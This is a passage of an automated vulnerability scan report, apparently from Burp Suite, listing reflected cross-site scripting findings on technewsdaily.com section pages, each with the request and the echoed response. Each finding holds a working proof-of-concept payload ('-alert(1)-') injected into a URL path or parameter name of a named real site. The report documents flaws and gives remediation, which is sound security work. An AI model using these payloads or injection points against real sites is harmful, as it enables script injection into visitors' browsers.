Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40424

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sectione223b'-alert(1)-'cf82c55609a/how-to",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.152. http://www.technewsdaily.com/section/how-to [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/how-to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7a6f'-alert(1)-'ecdb04ae96b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/how-to?b7a6f'-alert(1)-'ecdb04ae96b=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/how-to?b7a6f'-alert(1)-'ecdb04ae96b=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.153. http://www.technewsdaily.com/section/how-to/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/how-to/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb462'-alert(1)-'d9fa1703b88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sectioneb462'-alert(1)-'d9fa1703b88/how-to/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sectioneb462'-alert(1)-'d9fa1703b88/how-to/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.154. http://www.technewsdaily.com/section/how-to/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/how-to/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80934'-alert(1)-'ee8fb2ef08a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/how-to/?80934'-alert(1)-'ee8fb2ef08a=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/how-to/?80934'-alert(1)-'ee8fb2ef08a=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.155. http://www.technewsdaily.com/section/military-spy-tech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/military-spy-tech

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dd41'-alert(1)-'48fa1ab35e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section1dd41'-alert(1)-'48fa1ab35e2/military-spy-tech HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section1dd41'-alert(1)-'48fa1ab35e2/military-spy-tech",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.156. http://www.technewsdaily.com/section/military-spy-tech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/military-spy-tech

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2acfd'-alert(1)-'484bf885e33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/military-spy-tech?2acfd'-alert(1)-'484bf885e33=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44671

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/military-spy-tech?2acfd'-alert(1)-'484bf885e33=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.157. http://www.technewsdaily.com/section/military-spy-tech/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/military-spy-tech/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca2ef'-alert(1)-'8e30d5ca4ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sectionca2ef'-alert(1)-'8e30d5ca4ef/military-spy-tech/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sectionca2ef'-alert(1)-'8e30d5ca4ef/military-spy-tech/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.158. http://www.technewsdaily.com/section/military-spy-tech/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/military-spy-tech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58568'-alert(1)-'2ecfd29c056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/military-spy-tech/?58568'-alert(1)-'2ecfd29c056=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44689

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/military-spy-tech/?58568'-alert(1)-'2ecfd29c056=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.159. http://www.technewsdaily.com/section/mobile-life [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/mobile-life

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2614d'-alert(1)-'b77dab4c3fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section2614d'-alert(1)-'b77dab4c3fd/mobile-life HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section2614d'-alert(1)-'b77dab4c3fd/mobile-life",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.160. http://www.technewsdaily.com/section/mobile-life [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/mobile-life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 758e6'-alert(1)-'f992cee1521 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/mobile-life?758e6'-alert(1)-'f992cee1521=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46174

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/mobile-life?758e6'-alert(1)-'f992cee1521=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.161. http://www.technewsdaily.com/section/mobile-life/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/mobile-life/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc0e3'-alert(1)-'26b9f06a672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sectionbc0e3'-alert(1)-'26b9f06a672/mobile-life/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sectionbc0e3'-alert(1)-'26b9f06a672/mobile-life/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.162. http://www.technewsdaily.com/section/mobile-life/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/mobile-life/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0429'-alert(1)-'af79c163a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/mobile-life/?b0429'-alert(1)-'af79c163a51=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46192

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/mobile-life/?b0429'-alert(1)-'af79c163a51=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.163. http://www.technewsdaily.com/section/social-media [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/social-media

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33688'-alert(1)-'a99c01f62d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section33688'-alert(1)-'a99c01f62d7/social-media HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section33688'-alert(1)-'a99c01f62d7/social-media",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.164. http://www.technewsdaily.com/section/social-media [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/social-media

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 584c4'-alert(1)-'ed2b184271d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/social-media?584c4'-alert(1)-'ed2b184271d=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
